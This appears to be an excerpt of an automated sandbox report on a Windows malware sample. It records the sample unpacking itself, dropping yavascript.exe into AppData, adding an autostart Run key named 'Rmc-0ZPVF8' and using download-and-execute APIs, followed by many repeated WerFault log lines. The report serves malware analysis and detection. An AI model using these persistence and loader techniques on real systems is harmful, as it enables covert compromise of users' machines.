Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: kernel.appcore.dll

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Unpacked PE file: 0.2.ltlbVjClX9.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rebuf:R;.lituhu:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Unpacked PE file: 15.2.yavascript.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rebuf:R;.lituhu:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Unpacked PE file: 20.2.yavascript.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rebuf:R;.lituhu:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Unpacked PE file: 26.2.yavascript.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rebuf:R;.lituhu:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R;

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

0_2_0041CB50

Source: ltlbVjClX9.exe	Static PE information: section name: .rebuf
Source: ltlbVjClX9.exe	Static PE information: section name: .lituhu
Source: yavascript.exe.0.dr	Static PE information: section name: .rebuf
Source: yavascript.exe.0.dr	Static PE information: section name: .lituhu

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00457106 push ecx; ret	0_2_00457119
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0045B11A push esp; ret	0_2_0045B141
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0045E54D push esi; ret	0_2_0045E556
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00457A28 push eax; ret	0_2_00457A46
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00434E56 push ecx; ret	0_2_00434E69
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_006582F6 push FFFFFFF6h; retf	0_2_006582F8
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_006567C3 push cs; ret	0_2_006567C6
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00659864 push es; ret	0_2_00659865
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00657891 push eax; retf	0_2_00657893
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00657965 push cs; retf	0_2_00657A63
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00657A64 push cs; retf	0_2_00657A63
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00657A77 push cs; retf	0_2_00657A63
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00659E14 pushfd ; iretd	0_2_00659E15
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00659FC9 push ss; iretd	0_2_0065A01E
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00659F81 push ss; iretd	0_2_0065A01E
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0213F2B8 push esp; retf 0002h	0_2_0213F2BC
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0218736D push ecx; ret	0_2_02187380
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_021650BD push ecx; ret	0_2_021650D0
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02154C16 push esi; ret	0_2_02154C18
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02187C8F push eax; ret	0_2_02187CAD
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00457106 push ecx; ret	15_2_00457119
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0045B11A push esp; ret	15_2_0045B141
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0045E54D push esi; ret	15_2_0045E556
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00457A28 push eax; ret	15_2_00457A46
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00434E56 push ecx; ret	15_2_00434E69
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0055616B push cs; ret	15_2_0055616E
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0055920C push es; ret	15_2_0055920D
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00557239 push eax; retf	15_2_0055723B
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0055730D push cs; retf	15_2_0055740B
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0055741F push cs; retf	15_2_0055740B
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0055740C push cs; retf	15_2_0055740B

Source: ltlbVjClX9.exe	Static PE information: section name: .text entropy: 7.9182248790809595
Source: yavascript.exe.0.dr	Static PE information: section name: .text entropy: 7.9182248790809595

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_00406EB0 ShellExecuteW,URLDownloadToFileW,

0_2_00406EB0

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

File created: C:\Users\user\AppData\Roaming\yavascript.exe

Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-0ZPVF8

Jump to behavior

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

0_2_0041AA4A

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-0ZPVF8			Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-0ZPVF8			Jump to behavior

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

0_2_0041CB50

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
